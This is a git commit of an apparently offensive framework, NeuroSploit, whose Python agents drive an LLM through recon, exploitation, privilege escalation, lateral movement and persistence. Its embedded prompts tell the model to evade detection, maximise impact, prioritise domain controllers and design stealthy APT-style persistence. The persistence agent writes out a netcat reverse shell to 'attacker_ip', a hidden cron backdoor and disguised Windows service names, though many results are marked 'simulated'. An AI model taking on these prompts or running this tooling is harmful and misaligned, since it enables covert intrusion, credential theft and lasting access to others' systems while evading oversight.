mirror of https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-02-12 14:02:45 +00:00

Add files via upload
This commit is contained in:

0  agents/__init__.py  Normal file
78  agents/base_agent.py  Normal file
@@ -0,0 +1,78 @@
import json
import logging
from typing import Dict, Any, List, Optional

from core.llm_manager import LLMManager

logger = logging.getLogger(__name__)


class BaseAgent:
    """
    A generic agent class that orchestrates LLM interactions, tool usage,
    and adheres to specific agent roles (e.g., Red Team, Blue Team).
    """

    def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict):
        self.agent_name = agent_name
        self.config = config
        self.llm_manager = llm_manager
        self.context_prompts = context_prompts  # Contains the user_prompt and system_prompt for this agent role

        self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {})
        self.tools_allowed = self.agent_role_config.get('tools_allowed', [])
        self.description = self.agent_role_config.get('description', 'No description provided.')

        logger.info(f"Initialized {self.agent_name} agent. Description: {self.description}")

    def _prepare_prompt(self, user_input: str, additional_context: Dict = None) -> str:
        """
        Prepares the user prompt for the LLM, incorporating agent-specific instructions
        and dynamic context.
        """
        user_prompt_template = self.context_prompts.get("user_prompt", "")
        if not user_prompt_template:
            logger.warning(f"No user prompt template found for agent {self.agent_name}.")
            return user_input  # Fall back to the raw user input

        # Format the user prompt with dynamic context, handling missing keys safely.
        # The template is expected to use the placeholders {user_input} and
        # {additional_context_json}; for a generic solution, all additional_context
        # is passed as a single JSON blob.
        try:
            formatted_prompt = user_prompt_template.format(
                user_input=user_input,
                additional_context_json=json.dumps(additional_context or {}, indent=2)
                # Add more specific placeholders if needed, e.g.
                # target_info_json=json.dumps(additional_context.get('target_info', {}), indent=2)
            )
        except KeyError as e:
            logger.error(f"Missing key in prompt template for {self.agent_name}: {e}. Falling back to basic prompt.")
            formatted_prompt = f"{user_prompt_template}\n\nContext: {json.dumps(additional_context or {}, indent=2)}\n\nInput: {user_input}"

        return formatted_prompt

    def execute(self, user_input: str, campaign_data: Dict = None) -> Dict:
        """
        Executes the agent's task using the LLM and potentially external tools.
        `campaign_data` can be used to pass ongoing results or context between agent executions.
        """
        logger.info(f"Executing {self.agent_name} agent for input: {user_input[:50]}...")

        system_prompt = self.context_prompts.get("system_prompt", "")
        if not system_prompt:
            logger.warning(f"No system prompt found for agent {self.agent_name}. Using generic system prompt.")
            system_prompt = f"You are an expert {self.agent_name}. Analyze the provided information and generate a response."

        # Prepare the user prompt with the current input and campaign data
        prepared_user_prompt = self._prepare_prompt(user_input, campaign_data)

        llm_response_text = self.llm_manager.generate(prepared_user_prompt, system_prompt)

        # This is where tool usage based on llm_response_text and self.tools_allowed
        # would be integrated. That will be more complex and may involve
        # re-prompting the LLM or a function-calling mechanism.
        # For now, the LLM's direct response is returned as-is.
        return {"agent_name": self.agent_name, "input": user_input, "llm_response": llm_response_text}

    def get_allowed_tools(self) -> List[str]:
        """Returns the list of tools allowed for this agent role."""
        return self.tools_allowed
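For illustration, a minimal usage sketch (not part of the commit) showing how BaseAgent might be driven, assuming an LLMManager with the generate(user_prompt, system_prompt) method called above and the agent_roles layout from config/config.json; the prompt strings and the LLMManager constructor call are assumptions:

    # Hedged sketch: config keys mirror config/config.json; the prompt texts are hypothetical.
    import json
    from core.llm_manager import LLMManager
    from agents.base_agent import BaseAgent

    with open("config/config.json") as f:
        config = json.load(f)

    llm_manager = LLMManager(config)  # assumed constructor, as used by the other agents

    context_prompts = {
        "system_prompt": "You are a red team planning assistant.",  # hypothetical
        "user_prompt": "Task: {user_input}\n\nContext:\n{additional_context_json}",
    }

    agent = BaseAgent("red_team_agent", config, llm_manager, context_prompts)
    result = agent.execute(
        "Plan the next step against the lab target",
        campaign_data={"phases": {"recon": {"subdomains": ["dev.example.com"]}}},
    )
    print(result["llm_response"])
    print(agent.get_allowed_tools())  # e.g. ["nmap", "metasploit", "hydra"] per config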
256  agents/exploitation_agent.py  Normal file
@@ -0,0 +1,256 @@
#!/usr/bin/env python3
"""
Exploitation Agent - Vulnerability exploitation and access gaining
"""

import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.exploitation import (
    ExploitDatabase,
    MetasploitWrapper,
    WebExploiter,
    SQLInjector,
    RCEExploiter,
    BufferOverflowExploiter
)

logger = logging.getLogger(__name__)


class ExploitationAgent:
    """Agent responsible for vulnerability exploitation"""

    def __init__(self, config: Dict):
        """Initialize exploitation agent"""
        self.config = config
        self.llm = LLMManager(config)
        self.exploit_db = ExploitDatabase(config)
        self.metasploit = MetasploitWrapper(config)
        self.web_exploiter = WebExploiter(config)
        self.sql_injector = SQLInjector(config)
        self.rce_exploiter = RCEExploiter(config)
        self.bof_exploiter = BufferOverflowExploiter(config)

        logger.info("ExploitationAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute exploitation phase"""
        logger.info(f"Starting exploitation on {target}")

        results = {
            "target": target,
            "status": "running",
            "successful_exploits": [],
            "failed_attempts": [],
            "shells_obtained": [],
            "credentials_found": [],
            "ai_recommendations": {}
        }

        try:
            # Get reconnaissance data from context
            recon_data = context.get("phases", {}).get("recon", {})

            # Phase 1: Vulnerability Analysis
            logger.info("Phase 1: Analyzing vulnerabilities")
            vulnerabilities = self._identify_vulnerabilities(recon_data)

            # Phase 2: AI-powered Exploit Selection
            logger.info("Phase 2: AI exploit selection")
            exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data)
            results["ai_recommendations"] = exploit_plan

            # Phase 3: Execute Exploits
            logger.info("Phase 3: Executing exploits")
            for vuln in vulnerabilities[:5]:  # Limit to the top 5 vulnerabilities
                exploit_result = self._attempt_exploitation(vuln, target)

                if exploit_result.get("success"):
                    results["successful_exploits"].append(exploit_result)
                    logger.info(f"Successful exploit: {vuln.get('type')}")

                    # Check for shell access
                    if exploit_result.get("shell_access"):
                        results["shells_obtained"].append(exploit_result["shell_info"])
                else:
                    results["failed_attempts"].append(exploit_result)

            # Phase 4: Post-Exploitation Intelligence
            if results["successful_exploits"]:
                logger.info("Phase 4: Post-exploitation intelligence gathering")
                results["post_exploit_intel"] = self._gather_post_exploit_intel(
                    results["successful_exploits"]
                )

            results["status"] = "completed"
            logger.info("Exploitation phase completed")

        except Exception as e:
            logger.error(f"Error during exploitation: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]:
        """Identify exploitable vulnerabilities from recon data"""
        vulnerabilities = []

        # Check network scan results
        network_scan = recon_data.get("network_scan", {})
        for host, data in network_scan.get("hosts", {}).items():
            for port in data.get("open_ports", []):
                vuln = {
                    "type": "network_service",
                    "host": host,
                    "port": port.get("port"),
                    "service": port.get("service"),
                    "version": port.get("version")
                }
                vulnerabilities.append(vuln)

        # Check web vulnerabilities
        web_analysis = recon_data.get("web_analysis", {})
        for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]:
            if web_analysis.get(vuln_type):
                vulnerabilities.append({
                    "type": vuln_type,
                    "details": web_analysis[vuln_type]
                })

        return vulnerabilities

    def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict:
        """Use AI to plan exploitation strategy"""
        # The default template uses named placeholders that are filled via .format() below.
        prompt = self.llm.get_prompt(
            "exploitation",
            "ai_exploit_planning_user",
            default="""
Plan an exploitation strategy based on the following data:

Vulnerabilities Identified:
{vulnerabilities_json}

Reconnaissance Data:
{recon_data_json}

Provide:
1. Prioritized exploitation order
2. Recommended exploits for each vulnerability
3. Payload suggestions
4. Evasion techniques
5. Fallback strategies
6. Success probability estimates

Response in JSON format with detailed exploitation roadmap.
"""
        )

        system_prompt = self.llm.get_prompt(
            "exploitation",
            "ai_exploit_planning_system",
            default="""You are an expert exploit developer and penetration tester.
Create sophisticated exploitation plans considering detection, success rates, and impact.
Prioritize stealthy, reliable exploits over noisy attempts."""
        )

        try:
            formatted_prompt = prompt.format(
                vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
                recon_data_json=json.dumps(recon_data, indent=2)
            )
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI exploit planning error: {e}")
            return {"error": str(e)}

    def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict:
        """Attempt to exploit a specific vulnerability"""
        vuln_type = vulnerability.get("type")

        result = {
            "vulnerability": vulnerability,
            "success": False,
            "method": None,
            "details": {}
        }

        try:
            if vuln_type == "sql_injection":
                result = self.sql_injector.exploit(target, vulnerability)
            elif vuln_type in ["xss", "csrf"]:
                result = self.web_exploiter.exploit(target, vulnerability)
            elif vuln_type in ["rce", "command_injection"]:
                result = self.rce_exploiter.exploit(target, vulnerability)
            elif vuln_type == "buffer_overflow":
                result = self.bof_exploiter.exploit(target, vulnerability)
            elif vuln_type == "network_service":
                result = self._exploit_network_service(target, vulnerability)
            else:
                # Use Metasploit for generic exploitation
                result = self.metasploit.exploit(target, vulnerability)

        except Exception as e:
            logger.error(f"Exploitation error for {vuln_type}: {e}")
            result["error"] = str(e)

        return result

    def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict:
        """Exploit network service vulnerabilities"""
        service = vulnerability.get("service", "").lower()

        # Check the exploit database for known exploits
        exploits = self.exploit_db.search(service, vulnerability.get("version"))

        if exploits:
            logger.info(f"Found {len(exploits)} exploits for {service}")

            for exploit in exploits[:3]:  # Try the top 3 exploits
                result = self.metasploit.run_exploit(
                    exploit["module"],
                    target,
                    vulnerability.get("port")
                )

                if result.get("success"):
                    return result

        return {"success": False, "message": "No suitable exploits found"}

    def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict:
        """Gather intelligence after successful exploitation"""
        intel = {
            "system_info": [],
            "user_accounts": [],
            "network_info": [],
            "installed_software": [],
            "credentials": []
        }

        for exploit in successful_exploits:
            if exploit.get("shell_access"):
                shell = exploit["shell_info"]

                # Gather system information.
                # This would execute actual commands on the compromised system;
                # placeholder values are used for demonstration.
                intel["system_info"].append({
                    "os": "detected_os",
                    "hostname": "detected_hostname",
                    "architecture": "x64"
                })

        return intel

    def generate_custom_exploit(self, vulnerability: Dict) -> str:
        """Generate custom exploit using AI"""
        target_info = {
            "vulnerability": vulnerability,
            "requirements": "Create working exploit code"
        }

        return self.llm.generate_payload(target_info, vulnerability.get("type"))
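A sketch of the `context` shape that `ExploitationAgent.execute()` and `_identify_vulnerabilities()` expect; the keys are inferred from the code above, the concrete values are invented for illustration:

    # Hypothetical input; only the key structure matches what the agent reads.
    context = {
        "phases": {
            "recon": {
                "network_scan": {
                    "hosts": {
                        "10.0.0.5": {
                            "open_ports": [
                                {"port": 22, "service": "ssh", "version": "OpenSSH 8.2"},
                                {"port": 80, "service": "http", "version": "nginx 1.18"},
                            ]
                        }
                    }
                },
                "web_analysis": {
                    "sql_injection": [{"url": "http://10.0.0.5/item?id=1", "parameter": "id"}]
                },
            }
        }
    }

    # agent = ExploitationAgent(config)
    # results = agent.execute("10.0.0.5", context)
    # results["ai_recommendations"] holds the parsed exploit plan;
    # results["successful_exploits"] / results["failed_attempts"] hold per-vuln outcomes.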
199  agents/lateral_agent.py  Normal file
@@ -0,0 +1,199 @@
#!/usr/bin/env python3
"""
Lateral Movement Agent - Move through the network
"""

import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager

logger = logging.getLogger(__name__)


class LateralMovementAgent:
    """Agent responsible for lateral movement"""

    def __init__(self, config: Dict):
        """Initialize lateral movement agent"""
        self.config = config
        self.llm = LLMManager(config)
        logger.info("LateralMovementAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute lateral movement phase"""
        logger.info(f"Starting lateral movement from {target}")

        results = {
            "target": target,
            "status": "running",
            "discovered_hosts": [],
            "compromised_hosts": [],
            "credentials_used": [],
            "movement_paths": [],
            "ai_analysis": {}
        }

        try:
            # Get previous phase data
            recon_data = context.get("phases", {}).get("recon", {})
            privesc_data = context.get("phases", {}).get("privilege_escalation", {})

            # Phase 1: Network Discovery
            logger.info("Phase 1: Internal network discovery")
            results["discovered_hosts"] = self._discover_internal_network(recon_data)

            # Phase 2: AI-Powered Movement Strategy
            logger.info("Phase 2: AI lateral movement strategy")
            strategy = self._ai_movement_strategy(context, results["discovered_hosts"])
            results["ai_analysis"] = strategy

            # Phase 3: Credential Reuse
            logger.info("Phase 3: Credential reuse attacks")
            credentials = privesc_data.get("credentials_harvested", [])
            results["credentials_used"] = self._attempt_credential_reuse(
                results["discovered_hosts"],
                credentials
            )

            # Phase 4: Pass-the-Hash/Pass-the-Ticket
            logger.info("Phase 4: Pass-the-Hash/Ticket attacks")
            results["movement_paths"].extend(
                self._pass_the_hash_attacks(results["discovered_hosts"])
            )

            # Phase 5: Exploit Trust Relationships
            logger.info("Phase 5: Exploiting trust relationships")
            results["movement_paths"].extend(
                self._exploit_trust_relationships(results["discovered_hosts"])
            )

            results["status"] = "completed"
            logger.info("Lateral movement phase completed")

        except Exception as e:
            logger.error(f"Error during lateral movement: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _discover_internal_network(self, recon_data: Dict) -> List[Dict]:
        """Discover internal network hosts"""
        hosts = []

        # Extract hosts from recon data
        network_scan = recon_data.get("network_scan", {})
        for ip, data in network_scan.get("hosts", {}).items():
            hosts.append({
                "ip": ip,
                "ports": data.get("open_ports", []),
                "os": data.get("os", "unknown")
            })

        # Simulate additional internal discovery
        hosts.extend([
            {"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"},
            {"ip": "192.168.1.20", "role": "file_server", "status": "discovered"},
            {"ip": "192.168.1.30", "role": "workstation", "status": "discovered"}
        ])

        return hosts

    def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict:
        """Use AI to plan lateral movement"""
        # The default template uses named placeholders that are filled via .format() below.
        prompt = self.llm.get_prompt(
            "lateral_movement",
            "ai_movement_strategy_user",
            default="""
Plan a lateral movement strategy based on the following:

Current Context:
{context_json}

Discovered Hosts:
{hosts_json}

Provide:
1. Target prioritization (high-value targets first)
2. Movement techniques for each target
3. Credential strategies
4. Evasion techniques
5. Attack path optimization
6. Fallback options

Response in JSON format with detailed attack paths.
"""
        )

        system_prompt = self.llm.get_prompt(
            "lateral_movement",
            "ai_movement_strategy_system",
            default="""You are an expert in lateral movement and Active Directory attacks.
Plan sophisticated movement strategies that minimize detection and maximize impact.
Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.
Prioritize domain controllers and critical infrastructure."""
        )

        try:
            formatted_prompt = prompt.format(
                context_json=json.dumps(context, indent=2),
                hosts_json=json.dumps(hosts, indent=2)
            )
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI movement strategy error: {e}")
            return {"error": str(e)}

    def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]:
        """Attempt credential reuse across hosts"""
        attempts = []

        for host in hosts[:5]:  # Limit attempts
            for cred in credentials[:3]:
                attempts.append({
                    "host": host.get("ip"),
                    "credential": "***hidden***",
                    "protocol": "SMB",
                    "success": False,  # Simulated
                    "status": "simulated"
                })

        return attempts

    def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]:
        """Perform Pass-the-Hash attacks"""
        attacks = []

        for host in hosts:
            if host.get("role") in ["domain_controller", "file_server"]:
                attacks.append({
                    "type": "pass_the_hash",
                    "target": host.get("ip"),
                    "technique": "SMB relay",
                    "success": False,  # Simulated
                    "status": "simulated"
                })

        return attacks

    def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]:
        """Exploit trust relationships"""
        exploits = []

        # Domain trust exploitation
        exploits.append({
            "type": "domain_trust",
            "description": "Cross-domain exploitation",
            "status": "simulated"
        })

        # Kerberos delegation
        exploits.append({
            "type": "kerberos_delegation",
            "description": "Unconstrained delegation abuse",
            "status": "simulated"
        })

        return exploits
148  agents/network_recon_agent.py  Normal file
@@ -0,0 +1,148 @@
#!/usr/bin/env python3
"""
Network Reconnaissance Agent - Network-focused information gathering and enumeration
"""

import os
import json
import subprocess
from typing import Dict, List
import logging
from core.llm_manager import LLMManager
from tools.recon import (
    NetworkScanner,
    OSINTCollector,
    DNSEnumerator,
    SubdomainFinder
)
from urllib.parse import urlparse

logger = logging.getLogger(__name__)


class NetworkReconAgent:
    """Agent responsible for network-focused reconnaissance and information gathering"""

    def __init__(self, config: Dict):
        """Initialize network reconnaissance agent"""
        self.config = config
        self.llm = LLMManager(config)
        self.network_scanner = NetworkScanner(config)
        self.osint = OSINTCollector(config)
        self.dns_enum = DNSEnumerator(config)
        self.subdomain_finder = SubdomainFinder(config)

        logger.info("NetworkReconAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute network reconnaissance phase"""
        logger.info(f"Starting network reconnaissance on {target}")

        results = {
            "target": target,
            "status": "running",
            "findings": [],
            "network_scan": {},
            "osint": {},
            "dns": {},
            "subdomains": [],
            "ai_analysis": {}
        }

        # Parse the target to extract the hostname if it is a URL;
        # fall back to the original target string otherwise.
        parsed_target = urlparse(target)
        target_host = parsed_target.hostname or target
        logger.info(f"Target for network tools: {target_host}")

        try:
            # Phase 1: Network Scanning
            logger.info("Phase 1: Network scanning")
            results["network_scan"] = self.network_scanner.scan(target_host)

            # Phase 2: DNS Enumeration
            logger.info("Phase 2: DNS enumeration")
            results["dns"] = self.dns_enum.enumerate(target_host)

            # Phase 3: Subdomain Discovery
            logger.info("Phase 3: Subdomain discovery")
            results["subdomains"] = self.subdomain_finder.find(target_host)

            # Phase 4: OSINT Collection
            logger.info("Phase 4: OSINT collection")
            results["osint"] = self.osint.collect(target_host)

            # Phase 5: AI Analysis
            logger.info("Phase 5: AI-powered analysis")
            results["ai_analysis"] = self._ai_analysis(results)

            results["status"] = "completed"
            logger.info("Network reconnaissance phase completed")

        except Exception as e:
            logger.error(f"Error during network reconnaissance: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _ai_analysis(self, recon_data: Dict) -> Dict:
        """Use AI to analyze reconnaissance data"""
        # The default template uses a named placeholder that is filled via .format() below.
        prompt = self.llm.get_prompt(
            "network_recon",
            "ai_analysis_user",
            default="""
Analyze the following network reconnaissance data and provide insights:

{recon_data_json}

Provide:
1. Attack surface summary
2. Prioritized network target list
3. Identified network vulnerabilities or misconfigurations
4. Recommended next steps for network exploitation
5. Network risk assessment
6. Stealth considerations for network activities

Response in JSON format with actionable recommendations.
"""
        )

        system_prompt = self.llm.get_prompt(
            "network_recon",
            "ai_analysis_system",
            default="""You are an expert network penetration tester analyzing reconnaissance data.
Identify network security weaknesses, network attack vectors, and provide strategic recommendations.
Consider both technical and operational security aspects."""
        )

        response = None
        try:
            # Format the user prompt with the recon data
            formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2))
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI analysis error: {e}")
            return {"error": str(e), "raw_response": response}

    def passive_recon(self, target: str) -> Dict:
        """Perform passive reconnaissance only"""
        # Parse the target to extract the hostname if it is a URL
        parsed_target = urlparse(target)
        target_host = parsed_target.hostname or target

        return {
            "osint": self.osint.collect(target_host),
            "dns": self.dns_enum.enumerate(target_host),
            "subdomains": self.subdomain_finder.find(target_host)
        }

    def active_recon(self, target: str) -> Dict:
        """Perform active reconnaissance"""
        # Parse the target to extract the hostname if it is a URL
        parsed_target = urlparse(target)
        target_host = parsed_target.hostname or target

        return {
            "network_scan": self.network_scanner.scan(target_host)
        }
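The hostname-or-fallback logic above behaves differently for URLs and bare hosts; a small standalone check using only the standard library:

    # urllib.parse.urlparse only populates .hostname when a scheme is present,
    # which is why the agent falls back to the original target string.
    from urllib.parse import urlparse

    for target in ["https://app.example.com:8443/login", "example.com", "10.0.0.5"]:
        parsed = urlparse(target)
        target_host = parsed.hostname or target
        print(f"{target!r} -> {target_host!r}")

    # 'https://app.example.com:8443/login' -> 'app.example.com'
    # 'example.com'                        -> 'example.com'  (hostname is None, fallback used)
    # '10.0.0.5'                           -> '10.0.0.5'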
250  agents/persistence_agent.py  Normal file
@@ -0,0 +1,250 @@
#!/usr/bin/env python3
"""
Persistence Agent - Maintain access to compromised systems
"""

import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager

logger = logging.getLogger(__name__)


class PersistenceAgent:
    """Agent responsible for maintaining access"""

    def __init__(self, config: Dict):
        """Initialize persistence agent"""
        self.config = config
        self.llm = LLMManager(config)
        logger.info("PersistenceAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute persistence phase"""
        logger.info(f"Starting persistence establishment on {target}")

        results = {
            "target": target,
            "status": "running",
            "persistence_mechanisms": [],
            "backdoors_installed": [],
            "scheduled_tasks": [],
            "ai_recommendations": {}
        }

        try:
            # Get previous phase data
            privesc_data = context.get("phases", {}).get("privilege_escalation", {})

            if not privesc_data.get("successful_escalations"):
                logger.warning("No privilege escalation achieved. Limited persistence options.")
                results["status"] = "limited"

            # Phase 1: AI-Powered Persistence Strategy
            logger.info("Phase 1: AI persistence strategy")
            strategy = self._ai_persistence_strategy(context)
            results["ai_recommendations"] = strategy

            # Phase 2: Establish Persistence Mechanisms
            logger.info("Phase 2: Establishing persistence mechanisms")

            system_info = privesc_data.get("system_info", {})
            os_type = system_info.get("os", "unknown")

            if os_type == "linux":
                results["persistence_mechanisms"].extend(
                    self._establish_linux_persistence()
                )
            elif os_type == "windows":
                results["persistence_mechanisms"].extend(
                    self._establish_windows_persistence()
                )

            # Phase 3: Install Backdoors
            logger.info("Phase 3: Installing backdoors")
            results["backdoors_installed"] = self._install_backdoors(os_type)

            # Phase 4: Create Scheduled Tasks
            logger.info("Phase 4: Creating scheduled tasks")
            results["scheduled_tasks"] = self._create_scheduled_tasks(os_type)

            results["status"] = "completed"
            logger.info("Persistence phase completed")

        except Exception as e:
            logger.error(f"Error during persistence: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _ai_persistence_strategy(self, context: Dict) -> Dict:
        """Use AI to plan persistence strategy"""
        # The default template uses a named placeholder that is filled via .format() below.
        prompt = self.llm.get_prompt(
            "persistence",
            "ai_persistence_strategy_user",
            default="""
Plan a comprehensive persistence strategy based on the following context:

{context_json}

Provide:
1. Recommended persistence techniques (prioritized)
2. Stealth considerations
3. Resilience against system reboots
4. Evasion of detection mechanisms
5. Multiple fallback mechanisms
6. Cleanup and removal procedures

Response in JSON format with detailed implementation plan.
"""
        )

        system_prompt = self.llm.get_prompt(
            "persistence",
            "ai_persistence_strategy_system",
            default="""You are an expert in persistence techniques and advanced persistent threats.
Design robust, stealthy persistence mechanisms that survive reboots and detection attempts.
Consider both Windows and Linux environments.
Prioritize operational security and longevity."""
        )

        try:
            formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2))
            response = self.llm.generate(formatted_prompt, system_prompt)
            return json.loads(response)
        except Exception as e:
            logger.error(f"AI persistence strategy error: {e}")
            return {"error": str(e)}

    def _establish_linux_persistence(self) -> List[Dict]:
        """Establish Linux persistence mechanisms"""
        mechanisms = []

        # Cron job
        mechanisms.append({
            "type": "cron_job",
            "description": "Scheduled task for persistence",
            "command": "*/5 * * * * /tmp/.hidden/backdoor.sh",
            "status": "simulated"
        })

        # SSH key
        mechanisms.append({
            "type": "ssh_key",
            "description": "Authorized keys persistence",
            "location": "~/.ssh/authorized_keys",
            "status": "simulated"
        })

        # Systemd service
        mechanisms.append({
            "type": "systemd_service",
            "description": "Persistent system service",
            "service_name": "system-update.service",
            "status": "simulated"
        })

        # bashrc modification
        mechanisms.append({
            "type": "bashrc",
            "description": "Shell initialization persistence",
            "location": "~/.bashrc",
            "status": "simulated"
        })

        return mechanisms

    def _establish_windows_persistence(self) -> List[Dict]:
        """Establish Windows persistence mechanisms"""
        mechanisms = []

        # Registry Run key
        mechanisms.append({
            "type": "registry_run",
            "description": "Registry autorun persistence",
            "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
            "status": "simulated"
        })

        # Scheduled task
        mechanisms.append({
            "type": "scheduled_task",
            "description": "Windows scheduled task",
            "task_name": "WindowsUpdate",
            "status": "simulated"
        })

        # WMI event subscription
        mechanisms.append({
            "type": "wmi_event",
            "description": "WMI persistence",
            "status": "simulated"
        })

        # Service installation
        mechanisms.append({
            "type": "service",
            "description": "Windows service persistence",
            "service_name": "WindowsSecurityUpdate",
            "status": "simulated"
        })

        return mechanisms

    def _install_backdoors(self, os_type: str) -> List[Dict]:
        """Install backdoors"""
        backdoors = []

        if os_type == "linux":
            backdoors.extend([
                {
                    "type": "reverse_shell",
                    "description": "Netcat reverse shell",
                    "command": "nc -e /bin/bash attacker_ip 4444",
                    "status": "simulated"
                },
                {
                    "type": "ssh_backdoor",
                    "description": "SSH backdoor on alternate port",
                    "port": 2222,
                    "status": "simulated"
                }
            ])
        elif os_type == "windows":
            backdoors.extend([
                {
                    "type": "powershell_backdoor",
                    "description": "PowerShell reverse shell",
                    "status": "simulated"
                },
                {
                    "type": "meterpreter",
                    "description": "Meterpreter payload",
                    "status": "simulated"
                }
            ])

        return backdoors

    def _create_scheduled_tasks(self, os_type: str) -> List[Dict]:
        """Create scheduled tasks"""
        tasks = []

        if os_type == "linux":
            tasks.append({
                "type": "cron",
                "schedule": "*/10 * * * *",
                "command": "Callback beacon every 10 minutes",
                "status": "simulated"
            })
        elif os_type == "windows":
            tasks.append({
                "type": "scheduled_task",
                "schedule": "Daily at 2 AM",
                "command": "Callback beacon",
                "status": "simulated"
            })

        return tasks
305  agents/privesc_agent.py  Normal file
@@ -0,0 +1,305 @@
#!/usr/bin/env python3
"""
Privilege Escalation Agent - System privilege elevation
"""

import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.privesc import (
    LinuxPrivEsc,
    WindowsPrivEsc,
    KernelExploiter,
    MisconfigFinder,
    CredentialHarvester,
    SudoExploiter
)

logger = logging.getLogger(__name__)


class PrivEscAgent:
    """Agent responsible for privilege escalation"""

    def __init__(self, config: Dict):
        """Initialize privilege escalation agent"""
        self.config = config
        self.llm = LLMManager(config)
        self.linux_privesc = LinuxPrivEsc(config)
        self.windows_privesc = WindowsPrivEsc(config)
        self.kernel_exploiter = KernelExploiter(config)
        self.misconfig_finder = MisconfigFinder(config)
        self.cred_harvester = CredentialHarvester(config)
        self.sudo_exploiter = SudoExploiter(config)

        logger.info("PrivEscAgent initialized")

    def execute(self, target: str, context: Dict) -> Dict:
        """Execute privilege escalation phase"""
        logger.info(f"Starting privilege escalation on {target}")

        results = {
            "target": target,
            "status": "running",
            "escalation_paths": [],
            "successful_escalations": [],
            "credentials_harvested": [],
            "system_info": {},
            "ai_analysis": {}
        }

        try:
            # Get exploitation data from context
            exploit_data = context.get("phases", {}).get("exploitation", {})

            if not exploit_data.get("successful_exploits"):
                logger.warning("No successful exploits found. Limited privilege escalation options.")
                results["status"] = "skipped"
                results["message"] = "No initial access obtained"
                return results

            # Phase 1: System Enumeration
            logger.info("Phase 1: System enumeration")
            results["system_info"] = self._enumerate_system(exploit_data)

            # Phase 2: Identify Escalation Paths
            logger.info("Phase 2: Identifying escalation paths")
            results["escalation_paths"] = self._identify_escalation_paths(
                results["system_info"]
            )

            # Phase 3: AI-Powered Path Selection
            logger.info("Phase 3: AI escalation strategy")
            strategy = self._ai_escalation_strategy(
                results["system_info"],
                results["escalation_paths"]
            )
            results["ai_analysis"] = strategy

            # Phase 4: Execute Escalation Attempts
            logger.info("Phase 4: Executing escalation attempts")
            for path in results["escalation_paths"][:5]:
                escalation_result = self._attempt_escalation(path, results["system_info"])

                if escalation_result.get("success"):
                    results["successful_escalations"].append(escalation_result)
                    logger.info(f"Successful escalation: {path.get('technique')}")
                    break  # Stop after the first successful escalation

            # Phase 5: Credential Harvesting
            if results["successful_escalations"]:
                logger.info("Phase 5: Harvesting credentials")
                results["credentials_harvested"] = self._harvest_credentials(
                    results["system_info"]
                )

            results["status"] = "completed"
            logger.info("Privilege escalation phase completed")

        except Exception as e:
            logger.error(f"Error during privilege escalation: {e}")
            results["status"] = "error"
            results["error"] = str(e)

        return results

    def _enumerate_system(self, exploit_data: Dict) -> Dict:
        """Enumerate system for privilege escalation opportunities"""
        system_info = {
            "os": "unknown",
            "kernel_version": "unknown",
            "architecture": "unknown",
            "users": [],
            "groups": [],
            "sudo_permissions": [],
            "suid_binaries": [],
            "writable_paths": [],
            "scheduled_tasks": [],
            "services": [],
            "environment_variables": {}
        }

        # Determine OS type from exploit data
        os_type = self._detect_os_type(exploit_data)
        system_info["os"] = os_type

        if os_type == "linux":
            system_info.update(self.linux_privesc.enumerate())
        elif os_type == "windows":
            system_info.update(self.windows_privesc.enumerate())

        return system_info

    def _detect_os_type(self, exploit_data: Dict) -> str:
        """Detect operating system type"""
        # Placeholder - would analyze exploit data to determine the OS
        return "linux"  # Default assumption

    def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]:
        """Identify possible privilege escalation paths"""
        paths = []
        os_type = system_info.get("os")

        if os_type == "linux":
            # SUID exploitation
            for binary in system_info.get("suid_binaries", []):
                paths.append({
                    "technique": "suid_exploitation",
                    "target": binary,
                    "difficulty": "medium",
                    "likelihood": 0.6
                })

            # Sudo exploitation
            for permission in system_info.get("sudo_permissions", []):
                paths.append({
                    "technique": "sudo_exploitation",
                    "target": permission,
                    "difficulty": "low",
                    "likelihood": 0.8
                })

            # Kernel exploitation
            if system_info.get("kernel_version"):
                paths.append({
                    "technique": "kernel_exploit",
                    "target": system_info["kernel_version"],
                    "difficulty": "high",
                    "likelihood": 0.4
                })

            # Writable path exploitation
            for path in system_info.get("writable_paths", []):
                if "bin" in path or "sbin" in path:
                    paths.append({
                        "technique": "path_hijacking",
                        "target": path,
